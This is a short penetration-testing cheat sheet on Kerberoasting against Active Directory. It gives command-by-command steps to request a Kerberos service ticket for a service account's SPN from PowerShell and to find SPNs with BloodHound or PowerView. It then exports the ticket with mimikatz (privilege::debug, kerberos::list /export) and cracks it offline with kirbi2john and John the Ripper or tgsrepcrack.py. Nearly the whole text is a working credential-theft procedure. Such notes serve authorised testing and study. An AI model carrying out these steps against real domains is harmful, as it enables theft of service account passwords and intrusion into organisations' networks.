using mimikatz
using mimikatz
Method 1
Type 1) & 2) in powershell or cmd , this will generate requested service ticket
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “<SPN>” to get SPN, go to bloodhound>select service account>node info>spn Or with PowerView with the command
Get-NetUser -username "svc_tgs" -SPN | select samaccountname, primarygroupid, serviceprincipalname
Run mimikatz.exe privilege::debug
kerberos::list /export , download service ticket
exit to exit mimikatz
dir to check output and select the desire file and transfer it on your linux machine (if netcat used then transfer it in binary)
kirbi2john <file> >hash.txt
john hash.txt —wordlist=rockyou.txt
Method 2
Follow till step 5 to export service ticket , then ./tgsrepcrack.py <wordlist> <.kirbi file>
Last updated